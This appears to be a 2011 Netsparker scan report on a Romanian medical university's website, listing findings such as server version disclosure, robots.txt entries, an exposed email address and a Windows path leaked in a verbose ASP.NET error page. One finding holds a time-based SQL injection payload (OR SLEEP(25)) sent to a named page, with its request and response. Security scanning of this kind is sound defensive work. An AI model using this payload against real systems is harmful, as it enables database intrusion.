<ul> <li class=""><a class="" href="#">Information for</a> <ul> <li class=""><a class="" href="/lista.aspx?t=Admitere-Prezentare" onclick="document.location.href='/lista.aspx?t=Admitere-Prezentare'"><span class="dN">In section </span>Admission<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Rectorat-Prezentare'">University Presentation</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Admitere-2011" onclick="document.location.href='/Detaliu.aspx?t=Admitere-2011'">Application for 2011</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studenti-actuali-Prezentare" onclick="document.location.href='/lista.aspx?t=Studenti-actuali-Prezentare'"><span class="dN">In section </span>Current Students<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="#" onclick="document.location.href='#'">Educational Offer</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information for Students</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Organizatii-studentesti" onclick="document.location.href='/lista.aspx?t=Organizatii-studentesti'">Student Organizations</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Masterat-Prezentare" onclick="document.location.href='/lista.aspx?t=Masterat-Prezentare'"><span class="dN">In section </span>Master’s Degree<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="#" onclick="document.location.href='#'">Contact Information </a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information for MA Students</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=RezidentiatPrezentare" onclick="document.location.href='/lista.aspx?t=RezidentiatPrezentare'"><span class="dN">In section </span>Residency<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=RezidentiatDatedecontact" onclick="document.location.href='/Detaliu.aspx?t=RezidentiatDatedecontact'">Contact Information</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information regarding Residency</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Doctorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Doctorat-Prezentare'"><span class="dN">In section </span>Doctoral Studies<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Date-de-contact'">Presentation</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale'">Graduate School Organisation</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale'">Graduate School activity </a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=DoctoratBiroudeConsiliereCariera" onclick="document.location.href='/lista.aspx?t=DoctoratBiroudeConsiliereCariera'">Career orientation department</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studii-posuniversitare-Prezentare" onclick="document.location.href='/lista.aspx?t=Studii-posuniversitare-Prezentare'"><span class="dN">In section </span>Post University Studies<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact'">Contact Information </a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Information for Post University Studies </a> <ul class="dN"> </ul> </li> </ul> </li> </ul> </li> <li class=""><a class="" href="#">Information about</a> <ul> <li class=""><a class="" href="/lista.aspx?t=Universitare-Prezentare" onclick="document.location.href='/lista.aspx?t=Universitare-Prezentare'"><span class="dN">In section </span>University<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Rectorat-Prezentare'">The Rector’s Office</a> <ul class="dN"> <li class=""><a class="" href="/Detaliu.aspx?t=Rectorat-Prezentare&eID=62&c=0&m=0&y=0" onclick="document.location.href='/Detaliu.aspx?t=Rectorat-Prezentare..
Forbidden Resource

Forbidden Resource
1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /css/

/css/ CONFIRMED

http://umfcluj.ro/css/

Request

GET /css/ HTTP/1.1
Referer: http://umfcluj.ro/robots.txt
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:14:28 GMT
Content-Length: 1233


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
MySQL Database Identified

MySQL Database Identified
1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.
- /detaliu.aspx

/detaliu.aspx CONFIRMED

http://umfcluj.ro/detaliu.aspx?t=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&eID=451

Request

GET /detaliu.aspx?t=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&eID=451 HTTP/1.1
Referer: http://umfcluj.ro/en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:27:48 GMT
Content-Length: 80063



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta name="description" content="" />
<meta name="keywords" content="" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link type="text/css" rel="stylesheet" href="/css/common.css" /><link type="text/css" rel="stylesheet" href="/css/paging.css" /><link type="text/css" rel="stylesheet" href="/css/simplemodal.css" /><link type="text/css" rel="stylesheet" href="/css/thickbox.css" /><link type="text/css" rel="stylesheet" href="/css/search.css" /> <script type="text/javascript" src="/js/search.js"></script> <script type="text/javascript" src="/js/jquery.js"></script>
<script type="text/javascript" src="/js/jquery-ui.js"></script>
<script type="text/javascript" src="/js/jquery.hoverIntent.js"></script>
<script type="text/javascript" src="/js/jquery.emptyOnFocus.js"></script>
<script type="text/javascript" src="/js/jquery.alphanumeric.js"></script>
<script type="text/javascript" src="/js/jquery.simplemodal.js"></script>
<script type="text/javascript" src="/js/jquery.validate.js"></script>
<script type="text/javascript" src="/js/jquery.thickbox.js"></script>
<script type="text/javascript" src="/js/common.js"></script>
<script type="text/javascript" src="/js/globalizationro-RO.js"></script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>


<link type="text/css" rel="stylesheet" href="/css/lightbox.css" />
<script type="text/javascript" src="/js/jquery.lightbox.js"></script>
<title>

</title></head>
<body class="ro-RO" >
<form name="aspnetForm" method="post" action="detaliu.aspx?t=-111'+OR+SLEEP(25)%3d0+LIMIT+1--+&amp;eID=451" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODE0NzU5NDcxZGQ=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=PsRJDDMJscQZi9Ce6WIaqNcJm9qD4oZbuj0e0cvS49Oclg_D1D9Ia36SFWSTU_w_z5Hn_JRB35Zoryx_6ILPzzT48KU1&amp;t=634210472612724343" type="text/javascript"></script>

<div>

<input type="hidden" name="__SCROLLPOSITIONX" id="__SCROLLPOSITIONX" value="0" />
<input type="hidden" name="__SCROLLPOSITIONY" id="__SCROLLPOSITIONY" value="0" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBAK1xMK9BQLhw6AyAuzu3YUFAv/frr4K" />
</div>
<input type="hidden" id="hCulture" value="ro-RO" />

<div id="headerAll">

<div id="header" class="easyclear">
<div id="ctl00_logo"><a href="/">UMF</a></div>



<div id="lang">
<ul>

<li><a class="fr-FR " href="/fr"><label>Francais</label><span></span></a></li>



<li><a class="en-GB " href="/en"><label>English</label><span></span></a></li>



<li><a class="ro-RO active" href="/ro"><label>Romana</label><span></span></a></li>



</ul>
</div>


<div>
<fieldset id="search">
<!--<legend>Cauta produse</legend>-->
<label for="ctl00_txSearch">Cauta in site</label>
<input id="txSearch" class="txSearch" type="text" onkeyup="searchOnEnter(event);" />
<input id="searchSubmit" class="button" type="button" onclick="doSearch();" />
</fieldset>
</div>

<div id="aboutNav">

<ul> <li class=""><a class="" href="/">Prima pagină</a> <ul> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Adrese-in-Universitate">Adrese</a> <ul> </ul> </li> <li class=""><a class="" href="http://forum.redbyte.ro/">Forum</a> <ul> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Harta-Digitala">Harta digitala</a> <ul> </ul> </li> <li class=""><a class="" href="/sitemap.aspx">Harta site</a> <ul> </ul> </li> <li class=""><a class="" href="/contact.aspx">Contact</a> <ul> </ul> </li> </ul>
<hr />
</div>



<!--<div id="userNav">

<ul>
<li><a href="/Inregistrare.aspx">Inregistrare</a></li>
<li><a href="/Autentificare.aspx">Intrare cont</a></li>
</ul>

</div>-->



<!--<div id="inlineCartBar">
<div class="finalizeOrderDiv"><a class="finalizeOrder" href="/finalizareComanda.aspx">Finalizare Comanda</a></div>
<div id="inlineCartWrapper">
<a id="showInlineCart" href="#inlineCartDetails">Afisare cos</a>
<div id="inlineCart">
<ul><li></li></ul>
<div class="total easyclear">
<span>Cost total</span>
<strong></strong>
</div>
<div id="noProducts">Nu aveti produse in cos</div>
<div id="buyButtons"></div>
<div class="hideBorder"></div>
</div>
</div>
<h4 class="noProducts">Nu aveti produse in cos</h4> <span class="produseInCos"></span>
</div>-->



</div>

</div>
<!--<div id="wrapOuter">
<div class="tr">
<div class="bl">
<div class="br">-->
<div id="wrap" class="easyclear">


<div id="contextual" class="easyclear">
<img height="200" alt="" width="588" src="/Images/FCK/image/bgContextual.gif" /><br />

</div>


<!--<div id="breadcrumbs"></div>-->


<div id="leftSide">
<div id="tabs">
<ul> <li class=""><a class="" href="#">Informatii pentru</a> <ul> <li class=""><a class="" href="/lista.aspx?t=Admitere-Prezentare" onclick="document.location.href='/lista.aspx?t=Admitere-Prezentare'"><span class="dN">In sectiunea </span>Admitere<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/lista.aspx?t=Rectorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Rectorat-Prezentare'">Prezentarea Universitatii</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Simulare-Examen-2011" onclick="document.location.href='/Detaliu.aspx?t=Simulare-Examen-2011'">Simulare examen 2011</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Admitere-2011" onclick="document.location.href='/Detaliu.aspx?t=Admitere-2011'">Admitere 2011</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studenti-actuali-Prezentare" onclick="document.location.href='/lista.aspx?t=Studenti-actuali-Prezentare'"><span class="dN">In sectiunea </span>Studenti actuali<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="#" onclick="document.location.href='#'">Oferta educationala</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="#" onclick="document.location.href='#'">Informatii pentru studenti</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Organizatii-studentesti" onclick="document.location.href='/lista.aspx?t=Organizatii-studentesti'">Organizatii studentesti</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0'">Revista Studentilor</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Masterat-Prezentare" onclick="document.location.href='/lista.aspx?t=Masterat-Prezentare'"><span class="dN">In sectiunea </span>Masterat<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Masterat-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Masterat-Date-de-contact'">Date de contact</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Masterat-Informatii-pentru-masteranzi" onclick="document.location.href='/Detaliu.aspx?t=Masterat-Informatii-pentru-masteranzi'">Informatii pentru masteranzi</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=RezidentiatPrezentare" onclick="document.location.href='/lista.aspx?t=RezidentiatPrezentare'"><span class="dN">In sectiunea </span>Rezidentiat<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=RezidentiatDatedecontact" onclick="document.location.href='/Detaliu.aspx?t=RezidentiatDatedecontact'">Date de contact</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Rezidentiat-informatii" onclick="document.location.href='/Detaliu.aspx?t=Rezidentiat-informatii'">Informatii rezidentiat</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Doctorat-Prezentare" onclick="document.location.href='/lista.aspx?t=Doctorat-Prezentare'"><span class="dN">In sectiunea </span>Doctorat<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Date-de-contact'">Prezentare</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Organizarea-Scolii-Doctorale'">Organizarea Scolii Doctorale</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale" onclick="document.location.href='/Detaliu.aspx?t=Doctorat-Functionarea-Scolii-Doctorale'">Functionarea Scolii Doctorale</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=DoctoratBiroudeConsiliereCariera" onclick="document.location.href='/lista.aspx?t=DoctoratBiroudeConsiliereCariera'">Birou Consiliere Cariera</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Doctorat-Rezumate-Teze-de-Doctorat" onclick="document.location.href='/lista.aspx?t=Doctorat-Rezumate-Teze-de-Doctorat'">Rezumate teze de doctorat</a> <ul class="dN"> </ul> </li> </ul> </li> <li class=""><a class="" href="/lista.aspx?t=Studii-posuniversitare-Prezentare" onclick="document.location.href='/lista.aspx?t=Studii-posuniversitare-Prezentare'"><span class="dN">In sectiunea </span>Studii postuniversitare<span class="dN">:</span></a> <ul class=""> <li class=""><a class="" href="/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact" onclick="document.location.href='/Detaliu.aspx?t=Studii-posuniversitare-Date-de-contact'">Date de contact</a> <ul class="dN"> </ul> </li> <li class=""><a class="" href="/Detaliu.aspx?t=Studii-posuniversitare-Informatii-pentru-studii-postuniversitare" onclick="document.locat..
E-mail Address Disclosure

E-mail Address Disclosure
1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /js/jquery.hoverIntent.js

/js/jquery.hoverIntent.js

http://umfcluj.ro/js/jquery.hoverIntent.js

Found E-mails

brian@cherne.net

Request

GET /js/jquery.hoverIntent.js HTTP/1.1
Referer: http://umfcluj.ro/en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 05 May 2008 09:12:42 GMT
Accept-Ranges: bytes
ETag: "021312c90aec81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:14:28 GMT
Content-Length: 1609


/*** hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+* <http://cherne.net/brian/resources/jquery.hoverIntent.html>* * @param f onMouseOver function || An object with configuration options* @param g onMouseOut function || Nothing (use configuration options object)* @author Brian Cherne <brian@cherne.net>*/(function($){$.fn.hoverIntent=function(f,g){var cfg={sensitivity:7,interval:100,timeout:0};cfg=$.extend(cfg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"?e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover"){pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery);
IIS Version Disclosure

IIS Version Disclosure
1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /robots.txt

/robots.txt

http://umfcluj.ro/robots.txt

Extracted Version

Microsoft-IIS/7.0

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 18 May 2009 08:13:16 GMT
Accept-Ranges: bytes
ETag: "036d67e90d7c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:14:28 GMT
Content-Length: 86


User-Agent: *
Disallow: /css/
Disallow: /js/
Disallow: /WebResource.axd
Allow: /
Robots.txt Identified

Robots.txt Identified
1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified a possibly sensitive Robots.txt file with potentially sensitive content.

Impact

Depending on the content of the file, an attacker might discover hidden directories. Ensure that you have got nothing sensitive exposed within this folder such as the path of the administration panel.

Remedy

  • If disallowed paths are sensitive, do not write them in the robots.txt and ensure that they correctly protected by means of authentication.
- /robots.txt

/robots.txt CONFIRMED

http://umfcluj.ro/robots.txt

Interesting Robots.txt Entries

  • Disallow: /css/
  • Disallow: /js/
  • Disallow: /WebResource.axd

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: umfcluj.ro
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 18 May 2009 08:13:16 GMT
Accept-Ranges: bytes
ETag: "036d67e90d7c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:14:28 GMT
Content-Length: 86


User-Agent: *
Disallow: /css/
Disallow: /js/
Disallow: /WebResource.axd
Allow: /
[Possible] Internal Path Leakage (Windows)

[Possible] Internal Path Leakage (Windows)
5 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker either to identify other vulnerabilities or during the exploitation of other identified vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this file path was actually the real file path of the target web server.
  • Error messages should be disabled.
  • Remove this kind of sensitive data from the output.

External References

- /newsletter.aspx

/newsletter.aspx

http://umfcluj.ro/newsletter.aspx?newEmail=

Identified Internal Path(s)

c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_newsletter.aspx.cdcab7d2.0tgu9kdk.0.cs

Request

POST /newsletter.aspx?newEmail= HTTP/1.1
Referer: http://umfcluj.ro/newsletter.aspx?newEmail=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: umfcluj.ro
Cookie: ASP.NET_SessionId=ducpn3ab0namfu45jhzxdu3h
Content-Length: 308
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWBQLBopjuAQLhw6AyAuzu3YUFArGcpLcEAv%2ffrr4K&__SCROLLPOSITIONX=0&__SCROLLPOSITIONY=0&__VIEWSTATE=%2fwEPDwUKLTQzODg5NzM4Nw9kFgJmD2QWAgICD2QWAgIID2QWBAIDDxYCHgdWaXNpYmxlaGQCBQ8WAh8AaGRk&ctl00$cpBody$txEmail=&ctl00$hAction=&ctl00$txName=&ctl00$txNewsletter=

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:15:50 GMT
Content-Length: 5486


<html>
<head>
<title>The parameter 'address' cannot be an empty string.<br>Parameter name: address</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>The parameter 'address' cannot be an empty string.<br>Parameter name: address</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.ArgumentException: The parameter 'address' cannot be an empty string.<br>Parameter name: address<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[ArgumentException: The parameter 'address' cannot be an empty string.
Parameter name: address]
System.Net.Mail.MailAddress..ctor(String address, String displayName, Encoding displayNameEncoding) +1107953
System.Net.Mail.MailAddress..ctor(String address) +8
Netlogiq.Web.Newsletter.SaveSubscriber() +864
Netlogiq.Web.Newsletter.Page_Load(Object sender, EventArgs e) +199
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
System.Web.UI.Control.OnLoad(EventArgs e) +99
System.Web.UI.Control.LoadRecursive() +50
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.4214; ASP.NET Version:2.0.50727.4209

</font>

</body>
</html>
<!--
[ArgumentException]: The parameter 'address' cannot be an empty string.
Parameter name: address
at System.Net.Mail.MailAddress..ctor(String address, String displayName, Encoding displayNameEncoding)
at System.Net.Mail.MailAddress..ctor(String address)
at Netlogiq.Web.Newsletter.SaveSubscriber()
at Netlogiq.Web.Newsletter.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type 'System.Web.HttpUnhandledException' was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequestWithNoAssert(HttpContext context)
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at ASP.newsletter_aspx.ProcessRequest(HttpContext context) in c:\windows\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files\root\5947a21f\fb3cebc0\App_Web_newsletter.aspx.cdcab7d2.0tgu9kdk.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /lista.aspx

/lista.aspx

